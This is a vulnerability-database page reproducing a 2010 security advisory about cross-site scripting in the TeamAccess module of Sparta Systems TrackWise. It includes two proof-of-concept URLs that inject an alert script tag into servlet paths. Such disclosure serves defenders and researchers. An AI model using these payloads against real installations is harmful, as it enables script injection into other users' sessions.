Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Sparta Systems TrackWise TeamAccess Cross Site Scripting

🗓️ 03 Mar 2010 00:00:00Reported by Yaniv MironType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 49 Views

TrackWise TeamAccess Cross Site Scripting vulnerability in Sparta Systems

Code
`=========================================  
Yaniv Miron aka "Lament" Advisory Feb 28, 2010  
Sparta Systems TrackWise TeamAccess module Multiple Cross Site Scripting Vulnerabilities  
=========================================  
  
=====================  
I. BACKGROUND  
=====================  
TrackWise® by Sparta Systems: A Holistic Approach to Enterprise Quality Management   
  
TrackWise by Sparta Systems is an enterprise quality management solution (EQMS)  
that optimizes quality, ensures compliance and reduces costs for world-class clients  
across a range of industries. TrackWise is the only enterprise quality management solution that offers the flexibility and configurability   
  
to adapt to company-specific business processes,  
enabling our world-class clients across a range of industries to define, track, manage   
and report on the core activities vital to their success.  
  
http://www.spartasystems.com/trackwise-eqms/  
  
=====================  
II. DESCRIPTION  
=====================  
  
A malicious attacker may inject scripts into the TrackWise application.  
  
=====================  
III. ANALYSIS  
=====================  
  
Exploitation of this vulnerability results in the execution of arbitrary  
code using a malicious link.  
  
=====================  
IV. EXPLOIT  
=====================  
  
http://example.com/[TrackWiseDir]/servlet/TeamAccess/Login/"><script>alert('XSS-By-Lament')</script>  
  
http://example.com/[TrackWiseDir]/servlet/TeamAccess/BatchEditProgress.html/"><script>alert('XSS-By-Lament')</script>  
  
=====================  
V. DISCLOSURE TIMELINE  
=====================  
  
Jan 2009 Vulnerability Found  
Jan 2009 Vendor Notification  
Feb 2010 Public Disclosure  
  
=====================  
VI. CREDIT  
=====================  
  
Yaniv Miron aka "Lament".  
[email protected]  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
03 Mar 2010 00:00Current
0.3Low risk
Vulners AI Score0.3
sparta systemstrackwiseteamaccesscross site scriptingvulnerabilityexploitationyaniv miron
49